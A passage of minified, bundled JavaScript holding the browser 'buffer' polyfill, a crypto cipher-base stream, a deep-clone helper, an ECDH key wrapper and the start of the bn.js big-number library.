4:Wi=Oe[st+1],Ft=Oe[st+2],zt=Oe[st+3],128==(192&Wi)&&128==(192&Ft)&&128==(192&zt)&&(pa=(15&xt)<<18|(63&Wi)<<12|(63&Ft)<<6|63&zt,pa>65535&&pa<1114112&&(pt=pa))}}null===pt?(pt=65533,vt=1):pt>65535&&(pt-=65536,$e.push(pt>>>10&1023|55296),pt=56320|1023&pt),$e.push(pt),st+=vt}return function P(Oe){const Te=Oe.length;if(Te<=v)return String.fromCharCode.apply(String,Oe);let Le="",$e=0;for(;$e<Te;)Le+=String.fromCharCode.apply(String,Oe.slice($e,$e+=v));return Le}($e)}we.kMaxLength=ae,!(F.TYPED_ARRAY_SUPPORT=function I(){try{const Oe=new Uint8Array(1),Te={foo:function(){return 42}};return Object.setPrototypeOf(Te,Uint8Array.prototype),Object.setPrototypeOf(Oe,Te),42===Oe.foo()}catch(Oe){return!1}}())&&"undefined"!=typeof console&&"function"==typeof console.error&&console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support."),Object.defineProperty(F.prototype,"parent",{enumerable:!0,get:function(){if(F.isBuffer(this))return this.buffer}}),Object.defineProperty(F.prototype,"offset",{enumerable:!0,get:function(){if(F.isBuffer(this))return this.byteOffset}}),F.poolSize=8192,F.from=function(Oe,Te,Le){return E(Oe,Te,Le)},Object.setPrototypeOf(F.prototype,Uint8Array.prototype),Object.setPrototypeOf(F,Uint8Array),F.alloc=function(Oe,Te,Le){return function b(Oe,Te,Le){return g(Oe),Oe<=0?Q(Oe):void 0!==Te?"string"==typeof Le?Q(Oe).fill(Te,Le):Q(Oe).fill(Te):Q(Oe)}(Oe,Te,Le)},F.allocUnsafe=function(Oe){return _(Oe)},F.allocUnsafeSlow=function(Oe){return _(Oe)},F.isBuffer=function(Te){return null!=Te&&!0===Te._isBuffer&&Te!==F.prototype},F.compare=function(Te,Le){if(lt(Te,Uint8Array)&&(Te=F.from(Te,Te.offset,Te.byteLength)),lt(Le,Uint8Array)&&(Le=F.from(Le,Le.offset,Le.byteLength)),!F.isBuffer(Te)||!F.isBuffer(Le))throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');if(Te===Le)return 0;let $e=Te.length,st=Le.length;for(let xt=0,pt=Math.min($e,st);xt<pt;++xt)if(Te[xt]!==Le[xt]){$e=Te[xt],st=Le[xt];break}return $e<st?-1:st<$e?1:0},F.isEncoding=function(Te){switch(String(Te).toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"latin1":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return!0;default:return!1}},F.concat=function(Te,Le){if(!Array.isArray(Te))throw new TypeError('"list" argument must be an Array of Buffers');if(0===Te.length)return F.alloc(0);let $e;if(void 0===Le)for(Le=0,$e=0;$e<Te.length;++$e)Le+=Te[$e].length;const st=F.allocUnsafe(Le);let xt=0;for($e=0;$e<Te.length;++$e){let pt=Te[$e];if(lt(pt,Uint8Array))xt+pt.length>st.length?(F.isBuffer(pt)||(pt=F.from(pt)),pt.copy(st,xt)):Uint8Array.prototype.set.call(st,pt,xt);else{if(!F.isBuffer(pt))throw new TypeError('"list" argument must be an Array of Buffers');pt.copy(st,xt)}xt+=pt.length}return st},F.byteLength=O,F.prototype._isBuffer=!0,F.prototype.swap16=function(){const Te=this.length;if(Te%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let Le=0;Le<Te;Le+=2)K(this,Le,Le+1);return this},F.prototype.swap32=function(){const Te=this.length;if(Te%4!=0)throw new RangeError("Buffer size must be a multiple of 32-bits");for(let Le=0;Le<Te;Le+=4)K(this,Le,Le+3),K(this,Le+1,Le+2);return this},F.prototype.swap64=function(){const Te=this.length;if(Te%8!=0)throw new RangeError("Buffer size must be a multiple of 64-bits");for(let Le=0;Le<Te;Le+=8)K(this,Le,Le+7),K(this,Le+1,Le+6),K(this,Le+2,Le+5),K(this,Le+3,Le+4);return this},F.prototype.toLocaleString=F.prototype.toString=function(){const Te=this.length;return 0===Te?"":0===arguments.length?A(this,0,Te):U.apply(this,arguments)},F.prototype.equals=function(Te){if(!F.isBuffer(Te))throw new TypeError("Argument must be a Buffer");return this===Te||0===F.compare(this,Te)},F.prototype.inspect=function(){let Te="";const Le=we.INSPECT_MAX_BYTES;return Te=this.toString("hex",0,Le).replace(/(.{2})/g,"$1 ").trim(),this.length>Le&&(Te+=" ... "),"<Buffer "+Te+">"},$&&(F.prototype[$]=F.prototype.inspect),F.prototype.compare=function(Te,Le,$e,st,xt){if(lt(Te,Uint8Array)&&(Te=F.from(Te,Te.offset,Te.byteLength)),!F.isBuffer(Te))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof Te);if(void 0===Le&&(Le=0),void 0===$e&&($e=Te?Te.length:0),void 0===st&&(st=0),void 0===xt&&(xt=this.length),Le<0||$e>Te.length||st<0||xt>this.length)throw new RangeError("out of range index");if(st>=xt&&Le>=$e)return 0;if(st>=xt)return-1;if(Le>=$e)return 1;if(this===Te)return 0;let pt=(xt>>>=0)-(st>>>=0),vt=($e>>>=0)-(Le>>>=0);const Wi=Math.min(pt,vt),Ft=this.slice(st,xt),zt=Te.slice(Le,$e);for(let pa=0;pa<Wi;++pa)if(Ft[pa]!==zt[pa]){pt=Ft[pa],vt=zt[pa];break}return pt<vt?-1:vt<pt?1:0},F.prototype.includes=function(Te,Le,$e){return-1!==this.indexOf(Te,Le,$e)},F.prototype.indexOf=function(Te,Le,$e){return ee(this,Te,Le,$e,!0)},F.prototype.lastIndexOf=function(Te,Le,$e){return ee(this,Te,Le,$e,!1)},F.prototype.write=function(Te,Le,$e,st){if(void 0===Le)st="utf8",$e=this.length,Le=0;else if(void 0===$e&&"string"==typeof Le)st=Le,$e=this.length,Le=0;else{if(!isFinite(Le))throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");Le>>>=0,isFinite($e)?($e>>>=0,void 0===st&&(st="utf8")):(st=$e,$e=void 0)}const xt=this.length-Le;if((void 0===$e||$e>xt)&&($e=xt),Te.length>0&&($e<0||Le<0)||Le>this.length)throw new RangeError("Attempt to write outside buffer bounds");st||(st="utf8");let pt=!1;for(;;)switch(st){case"hex":return ve(this,Te,Le,$e);case"utf8":case"utf-8":return le(this,Te,Le,$e);case"ascii":case"latin1":case"binary":return ye(this,Te,Le,$e);case"base64":return z(this,Te,Le,$e);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return l(this,Te,Le,$e);default:if(pt)throw new TypeError("Unknown encoding: "+st);st=(""+st).toLowerCase(),pt=!0}},F.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const v=4096;function G(Oe,Te,Le){let $e="";Le=Math.min(Oe.length,Le);for(let st=Te;st<Le;++st)$e+=String.fromCharCode(127&Oe[st]);return $e}function X(Oe,Te,Le){let $e="";Le=Math.min(Oe.length,Le);for(let st=Te;st<Le;++st)$e+=String.fromCharCode(Oe[st]);return $e}function L(Oe,Te,Le){const $e=Oe.length;(!Te||Te<0)&&(Te=0),(!Le||Le<0||Le>$e)&&(Le=$e);let st="";for(let xt=Te;xt<Le;++xt)st+=xe[Oe[xt]];return st}function h(Oe,Te,Le){const $e=Oe.slice(Te,Le);let st="";for(let xt=0;xt<$e.length-1;xt+=2)st+=String.fromCharCode($e[xt]+256*$e[xt+1]);return st}function R(Oe,Te,Le){if(Oe%1!=0||Oe<0)throw new RangeError("offset is not uint");if(Oe+Te>Le)throw new RangeError("Trying to access beyond buffer length")}function J(Oe,Te,Le,$e,st,xt){if(!F.isBuffer(Oe))throw new TypeError('"buffer" argument must be a Buffer instance');if(Te>st||Te<xt)throw new RangeError('"value" argument is out of bounds');if(Le+$e>Oe.length)throw new RangeError("Index out of range")}function Z(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt,xt>>=8,Oe[Le++]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,pt>>=8,Oe[Le++]=pt,Le}function ue(Oe,Te,Le,$e,st){De(Te,$e,st,Oe,Le,7);let xt=Number(Te&BigInt(4294967295));Oe[Le+7]=xt,xt>>=8,Oe[Le+6]=xt,xt>>=8,Oe[Le+5]=xt,xt>>=8,Oe[Le+4]=xt;let pt=Number(Te>>BigInt(32)&BigInt(4294967295));return Oe[Le+3]=pt,pt>>=8,Oe[Le+2]=pt,pt>>=8,Oe[Le+1]=pt,pt>>=8,Oe[Le]=pt,Le+8}function Ie(Oe,Te,Le,$e,st,xt){if(Le+$e>Oe.length)throw new RangeError("Index out of range");if(Le<0)throw new RangeError("Index out of range")}function Ae(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,4),j.write(Oe,Te,Le,$e,23,4),Le+4}function Ue(Oe,Te,Le,$e,st){return Te=+Te,Le>>>=0,st||Ie(Oe,0,Le,8),j.write(Oe,Te,Le,$e,52,8),Le+8}F.prototype.slice=function(Te,Le){const $e=this.length;(Te=~~Te)<0?(Te+=$e)<0&&(Te=0):Te>$e&&(Te=$e),(Le=void 0===Le?$e:~~Le)<0?(Le+=$e)<0&&(Le=0):Le>$e&&(Le=$e),Le<Te&&(Le=Te);const st=this.subarray(Te,Le);return Object.setPrototypeOf(st,F.prototype),st},F.prototype.readUintLE=F.prototype.readUIntLE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt<Le&&(xt*=256);)st+=this[Te+pt]*xt;return st},F.prototype.readUintBE=F.prototype.readUIntBE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te+--Le],xt=1;for(;Le>0&&(xt*=256);)st+=this[Te+--Le]*xt;return st},F.prototype.readUint8=F.prototype.readUInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),this[Te]},F.prototype.readUint16LE=F.prototype.readUInt16LE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]|this[Te+1]<<8},F.prototype.readUint16BE=F.prototype.readUInt16BE=function(Te,Le){return Te>>>=0,Le||R(Te,2,this.length),this[Te]<<8|this[Te+1]},F.prototype.readUint32LE=F.prototype.readUInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),(this[Te]|this[Te+1]<<8|this[Te+2]<<16)+16777216*this[Te+3]},F.prototype.readUint32BE=F.prototype.readUInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),16777216*this[Te]+(this[Te+1]<<16|this[Te+2]<<8|this[Te+3])},F.prototype.readBigUInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,24),xt=this[++Te]+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+$e*Lo(2,24);return BigInt(st)+(BigInt(xt)<<BigInt(32))}),F.prototype.readBigUInt64BE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=Le*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te],xt=this[++Te]*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+$e;return(BigInt(st)<<BigInt(32))+BigInt(xt)}),F.prototype.readIntLE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=this[Te],xt=1,pt=0;for(;++pt<Le&&(xt*=256);)st+=this[Te+pt]*xt;return xt*=128,st>=xt&&(st-=Math.pow(2,8*Le)),st},F.prototype.readIntBE=function(Te,Le,$e){Te>>>=0,Le>>>=0,$e||R(Te,Le,this.length);let st=Le,xt=1,pt=this[Te+--st];for(;st>0&&(xt*=256);)pt+=this[Te+--st]*xt;return xt*=128,pt>=xt&&(pt-=Math.pow(2,8*Le)),pt},F.prototype.readInt8=function(Te,Le){return Te>>>=0,Le||R(Te,1,this.length),128&this[Te]?-1*(255-this[Te]+1):this[Te]},F.prototype.readInt16LE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te]|this[Te+1]<<8;return 32768&$e?4294901760|$e:$e},F.prototype.readInt16BE=function(Te,Le){Te>>>=0,Le||R(Te,2,this.length);const $e=this[Te+1]|this[Te]<<8;return 32768&$e?4294901760|$e:$e},F.prototype.readInt32LE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]|this[Te+1]<<8|this[Te+2]<<16|this[Te+3]<<24},F.prototype.readInt32BE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),this[Te]<<24|this[Te+1]<<16|this[Te+2]<<8|this[Te+3]},F.prototype.readBigInt64LE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=this[Te+4]+this[Te+5]*Lo(2,8)+this[Te+6]*Lo(2,16)+($e<<24);return(BigInt(st)<<BigInt(32))+BigInt(Le+this[++Te]*Lo(2,8)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,24))}),F.prototype.readBigInt64BE=We(function(Te){Ve(Te>>>=0,"offset");const Le=this[Te],$e=this[Te+7];(void 0===Le||void 0===$e)&&ze(Te,this.length-8);const st=(Le<<24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te];return(BigInt(st)<<BigInt(32))+BigInt(this[++Te]*Lo(2,24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+$e)}),F.prototype.readFloatLE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),j.read(this,Te,!0,23,4)},F.prototype.readFloatBE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),j.read(this,Te,!1,23,4)},F.prototype.readDoubleLE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!0,52,8)},F.prototype.readDoubleBE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!1,52,8)},F.prototype.writeUintLE=F.prototype.writeUIntLE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=1,pt=0;for(this[Le]=255&Te;++pt<$e&&(xt*=256);)this[Le+pt]=Te/xt&255;return Le+$e},F.prototype.writeUintBE=F.prototype.writeUIntBE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=$e-1,pt=1;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)this[Le+xt]=Te/pt&255;return Le+$e},F.prototype.writeUint8=F.prototype.writeUInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,255,0),this[Le]=255&Te,Le+1},F.prototype.writeUint16LE=F.prototype.writeUInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},F.prototype.writeUint16BE=F.prototype.writeUInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},F.prototype.writeUint32LE=F.prototype.writeUInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le+3]=Te>>>24,this[Le+2]=Te>>>16,this[Le+1]=Te>>>8,this[Le]=255&Te,Le+4},F.prototype.writeUint32BE=F.prototype.writeUInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},F.prototype.writeBigUInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),F.prototype.writeBigUInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),F.prototype.writeIntLE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=0,pt=1,vt=0;for(this[Le]=255&Te;++xt<$e&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt-1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},F.prototype.writeIntBE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=$e-1,pt=1,vt=0;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt+1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},F.prototype.writeInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,127,-128),Te<0&&(Te=255+Te+1),this[Le]=255&Te,Le+1},F.prototype.writeInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},F.prototype.writeInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},F.prototype.writeInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),this[Le]=255&Te,this[Le+1]=Te>>>8,this[Le+2]=Te>>>16,this[Le+3]=Te>>>24,Le+4},F.prototype.writeInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),Te<0&&(Te=4294967295+Te+1),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},F.prototype.writeBigInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),F.prototype.writeBigInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),F.prototype.writeFloatLE=function(Te,Le,$e){return Ae(this,Te,Le,!0,$e)},F.prototype.writeFloatBE=function(Te,Le,$e){return Ae(this,Te,Le,!1,$e)},F.prototype.writeDoubleLE=function(Te,Le,$e){return Ue(this,Te,Le,!0,$e)},F.prototype.writeDoubleBE=function(Te,Le,$e){return Ue(this,Te,Le,!1,$e)},F.prototype.copy=function(Te,Le,$e,st){if(!F.isBuffer(Te))throw new TypeError("argument should be a Buffer");if($e||($e=0),!st&&0!==st&&(st=this.length),Le>=Te.length&&(Le=Te.length),Le||(Le=0),st>0&&st<$e&&(st=$e),st===$e||0===Te.length||0===this.length)return 0;if(Le<0)throw new RangeError("targetStart out of bounds");if($e<0||$e>=this.length)throw new RangeError("Index out of range");if(st<0)throw new RangeError("sourceEnd out of bounds");st>this.length&&(st=this.length),Te.length-Le<st-$e&&(st=Te.length-Le+$e);const xt=st-$e;return this===Te&&"function"==typeof Uint8Array.prototype.copyWithin?this.copyWithin(Le,$e,st):Uint8Array.prototype.set.call(Te,this.subarray($e,st),Le),xt},F.prototype.fill=function(Te,Le,$e,st){if("string"==typeof Te){if("string"==typeof Le?(st=Le,Le=0,$e=this.length):"string"==typeof $e&&(st=$e,$e=this.length),void 0!==st&&"string"!=typeof st)throw new TypeError("encoding must be a string");if("string"==typeof st&&!F.isEncoding(st))throw new TypeError("Unknown encoding: "+st);if(1===Te.length){const pt=Te.charCodeAt(0);("utf8"===st&&pt<128||"latin1"===st)&&(Te=pt)}}else"number"==typeof Te?Te&=255:"boolean"==typeof Te&&(Te=Number(Te));if(Le<0||this.length<Le||this.length<$e)throw new RangeError("Out of range index");if($e<=Le)return this;let xt;if(Le>>>=0,$e=void 0===$e?this.length:$e>>>0,Te||(Te=0),"number"==typeof Te)for(xt=Le;xt<$e;++xt)this[xt]=Te;else{const pt=F.isBuffer(Te)?Te:F.from(Te,st),vt=pt.length;if(0===vt)throw new TypeError('The value "'+Te+'" is invalid for argument "value"');for(xt=0;xt<$e-Le;++xt)this[xt+Le]=pt[xt%vt]}return this};const Xe={};function He(Oe,Te,Le){Xe[Oe]=class extends Le{constructor(){super(),Object.defineProperty(this,"message",{value:Te.apply(this,arguments),writable:!0,configurable:!0}),this.name=`${this.name} [${Oe}]`,delete this.name}get code(){return Oe}set code(st){Object.defineProperty(this,"code",{configurable:!0,enumerable:!0,value:st,writable:!0})}toString(){return`${this.name} [${Oe}]: ${this.message}`}}}function Be(Oe){let Te="",Le=Oe.length;const $e="-"===Oe[0]?1:0;for(;Le>=$e+4;Le-=3)Te=`_${Oe.slice(Le-3,Le)}${Te}`;return`${Oe.slice(0,Le)}${Te}`}function De(Oe,Te,Le,$e,st,xt){if(Oe>Le||Oe<Te){const pt="bigint"==typeof Te?"n":"";let vt;throw vt=xt>3?0===Te||Te===BigInt(0)?`>= 0${pt} and < 2${pt} ** ${8*(xt+1)}${pt}`:`>= -(2${pt} ** ${8*(xt+1)-1}${pt}) and < 2 ** ${8*(xt+1)-1}${pt}`:`>= ${Te}${pt} and <= ${Le}${pt}`,new Xe.ERR_OUT_OF_RANGE("value",vt,Oe)}!function qe(Oe,Te,Le){Ve(Te,"offset"),(void 0===Oe[Te]||void 0===Oe[Te+Le])&&ze(Te,Oe.length-(Le+1))}($e,st,xt)}function Ve(Oe,Te){if("number"!=typeof Oe)throw new Xe.ERR_INVALID_ARG_TYPE(Te,"number",Oe)}function ze(Oe,Te,Le){throw Math.floor(Oe)!==Oe?(Ve(Oe,Le),new Xe.ERR_OUT_OF_RANGE(Le||"offset","an integer",Oe)):Te<0?new Xe.ERR_BUFFER_OUT_OF_BOUNDS:new Xe.ERR_OUT_OF_RANGE(Le||"offset",`>= ${Le?1:0} and <= ${Te}`,Oe)}He("ERR_BUFFER_OUT_OF_BOUNDS",function(Oe){return Oe?`${Oe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),He("ERR_INVALID_ARG_TYPE",function(Oe,Te){return`The "${Oe}" argument must be of type number. Received type ${typeof Te}`},TypeError),He("ERR_OUT_OF_RANGE",function(Oe,Te,Le){let $e=`The value of "${Oe}" is out of range.`,st=Le;return Number.isInteger(Le)&&Math.abs(Le)>Lo(2,32)?st=Be(String(Le)):"bigint"==typeof Le&&(st=String(Le),(Le>Lo(BigInt(2),BigInt(32))||Le<-Lo(BigInt(2),BigInt(32)))&&(st=Be(st)),st+="n"),$e+=` It must be ${Te}. Received ${st}`,$e},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function rt(Oe,Te){let Le;Te=Te||1/0;const $e=Oe.length;let st=null;const xt=[];for(let pt=0;pt<$e;++pt){if(Le=Oe.charCodeAt(pt),Le>55295&&Le<57344){if(!st){if(Le>56319){(Te-=3)>-1&&xt.push(239,191,189);continue}if(pt+1===$e){(Te-=3)>-1&&xt.push(239,191,189);continue}st=Le;continue}if(Le<56320){(Te-=3)>-1&&xt.push(239,191,189),st=Le;continue}Le=65536+(st-55296<<10|Le-56320)}else st&&(Te-=3)>-1&&xt.push(239,191,189);if(st=null,Le<128){if((Te-=1)<0)break;xt.push(Le)}else if(Le<2048){if((Te-=2)<0)break;xt.push(Le>>6|192,63&Le|128)}else if(Le<65536){if((Te-=3)<0)break;xt.push(Le>>12|224,Le>>6&63|128,63&Le|128)}else{if(!(Le<1114112))throw new Error("Invalid code point");if((Te-=4)<0)break;xt.push(Le>>18|240,Le>>12&63|128,Le>>6&63|128,63&Le|128)}}return xt}function ht(Oe){return ie.toByteArray(function Ke(Oe){if((Oe=(Oe=Oe.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;Oe.length%4!=0;)Oe+="=";return Oe}(Oe))}function mt(Oe,Te,Le,$e){let st;for(st=0;st<$e&&!(st+Le>=Te.length||st>=Oe.length);++st)Te[st+Le]=Oe[st];return st}function lt(Oe,Te){return Oe instanceof Te||null!=Oe&&null!=Oe.constructor&&null!=Oe.constructor.name&&Oe.constructor.name===Te.name}function ft(Oe){return Oe!=Oe}const xe=function(){const Oe="0123456789abcdef",Te=new Array(256);for(let Le=0;Le<16;++Le){const $e=16*Le;for(let st=0;st<16;++st)Te[$e+st]=Oe[Le]+Oe[st]}return Te}();function We(Oe){return"undefined"==typeof BigInt?Je:Oe}function Je(){throw new Error("BigInt not supported")}},4003:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(4893).Transform,$=de(5741).s;function I(Q){j.call(this),this.hashMode="string"==typeof Q,this.hashMode?this[Q]=this._finalOrDigest:this.final=this._finalOrDigest,this._final&&(this.__final=this._final,this._final=null),this._decoder=null,this._encoding=null}de(2270)(I,j),I.prototype.update=function(Q,F,E){"string"==typeof Q&&(Q=ie.from(Q,F));var g=this._update(Q);return this.hashMode?this:(E&&(g=this._toString(g,E)),g)},I.prototype.setAutoPadding=function(){},I.prototype.getAuthTag=function(){throw new Error("trying to get auth tag in unsupported state")},I.prototype.setAuthTag=function(){throw new Error("trying to set auth tag in unsupported state")},I.prototype.setAAD=function(){throw new Error("trying to set aad in unsupported state")},I.prototype._transform=function(Q,F,E){var g;try{this.hashMode?this._update(Q):this.push(this._update(Q))}catch(b){g=b}finally{E(g)}},I.prototype._flush=function(Q){var F;try{this.push(this.__final())}catch(E){F=E}Q(F)},I.prototype._finalOrDigest=function(Q){var F=this.__final()||ie.alloc(0);return Q&&(F=this._toString(F,Q,!0)),F},I.prototype._toString=function(Q,F,E){if(this._decoder||(this._decoder=new $(F),this._encoding=F),this._encoding!==F)throw new Error("can't switch encodings");var g=this._decoder.write(Q);return E&&(g+=this._decoder.end()),g},Pe.exports=I},4730:(Pe,we,de)=>{"use strict";const ie=de(7856),j=de(7374),$=de(9045);Pe.exports=function ae(F,E){switch(j(F)){case"object":return function I(F,E){if("function"==typeof E)return E(F);if(E||$(F)){const g=new F.constructor;for(let b in F)g[b]=ae(F[b],E);return g}return F}(F,E);case"array":return function Q(F,E){const g=new F.constructor(F.length);for(let b=0;b<F.length;b++)g[b]=ae(F[b],E);return g}(F,E);default:return ie(F)}}},9045:(Pe,we,de)=>{"use strict";var ie=de(7729);function j($){return!0===ie($)&&"[object Object]"===Object.prototype.toString.call($)}Pe.exports=function(ae){var I,Q;return!(!1===j(ae)||(I=ae.constructor,"function"!=typeof I)||(Q=I.prototype,!1===j(Q))||!1===Q.hasOwnProperty("isPrototypeOf"))}},4707:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(1875),$=de(8752);Pe.exports=function(E){return new I(E)};var ae={secp256k1:{name:"secp256k1",byteLength:32},secp224r1:{name:"p224",byteLength:28},prime256v1:{name:"p256",byteLength:32},prime192v1:{name:"p192",byteLength:24},ed25519:{name:"ed25519",byteLength:32},secp384r1:{name:"p384",byteLength:48},secp521r1:{name:"p521",byteLength:66}};function I(F){this.curveType=ae[F],this.curveType||(this.curveType={name:F}),this.curve=new j.ec(this.curveType.name),this.keys=void 0}function Q(F,E,g){Array.isArray(F)||(F=F.toArray());var b=new ie(F);if(g&&b.length<g){var _=new ie(g-b.length);_.fill(0),b=ie.concat([_,b])}return E?b.toString(E):b}ae.p224=ae.secp224r1,ae.p256=ae.secp256r1=ae.prime256v1,ae.p192=ae.secp192r1=ae.prime192v1,ae.p384=ae.secp384r1,ae.p521=ae.secp521r1,I.prototype.generateKeys=function(F,E){return this.keys=this.curve.genKeyPair(),this.getPublicKey(F,E)},I.prototype.computeSecret=function(F,E,g){return E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E)),Q(this.curve.keyFromPublic(F).getPublic().mul(this.keys.getPrivate()).getX(),g,this.curveType.byteLength)},I.prototype.getPublicKey=function(F,E){var g=this.keys.getPublic("compressed"===E,!0);return"hybrid"===E&&(g[0]=g[g.length-1]%2?7:6),Q(g,F)},I.prototype.getPrivateKey=function(F){return Q(this.keys.getPrivate(),F)},I.prototype.setPublicKey=function(F,E){return E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E)),this.keys._importPublic(F),this},I.prototype.setPrivateKey=function(F,E){E=E||"utf8",ie.isBuffer(F)||(F=new ie(F,E));var g=new $(F);return g=g.toString(16),this.keys=this.curve.genKeyPair(),this.keys._importPrivate(g),this}},8752:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(8623).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var 